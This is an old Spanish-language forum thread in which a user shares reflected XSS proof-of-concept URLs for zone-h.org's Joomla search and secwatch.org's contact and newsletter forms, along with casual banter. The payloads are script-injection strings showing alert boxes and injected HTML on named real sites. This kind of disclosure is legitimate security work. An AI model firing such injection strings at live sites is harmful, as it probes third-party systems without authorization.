XSS en Zone-H

Iniciado por WHK, 27 Octubre 2007, 16:53 PM

0 Miembros y 1 Visitante están viendo este tema.

WHK

Encontré un XSS en zone-h  :P ...muy curioso no?

http://www.zone-h.org/index.php?searchword=`´';}"></script><script>alert(/xss/);</script>&option=com_search&Itemid=5

Lo puse en xssed haber si lo ven antes que lo reparen y despues les aviso.

Por lo que vi hay muchos otros descubierto por otras personas... ya no me dan ganas de usar joomla jajajja.


WHK

Juazz
http://secwatch.org/?page=contact&name=a"><script>alert(/xss/);</script>

Además que raro cada ves que cambias pone una imagen diferente segun lo que escribas:

http://secwatch.org/account/?mode=newsletter&email=plop@tu.yossssssss'%22%3E%3Ch1%3Elol
http://secwatch.org/account/?mode=newsletter&email=holaaaaaaaa

:P


Man-In-the-Middle

jajajaj XD!!, que no  aprende ehh, que pasoo whk, no se te ve por el msn??

WHK

 :xD weee te bajaron el rango jajajajjaja ...ahi te veo  :P Salu2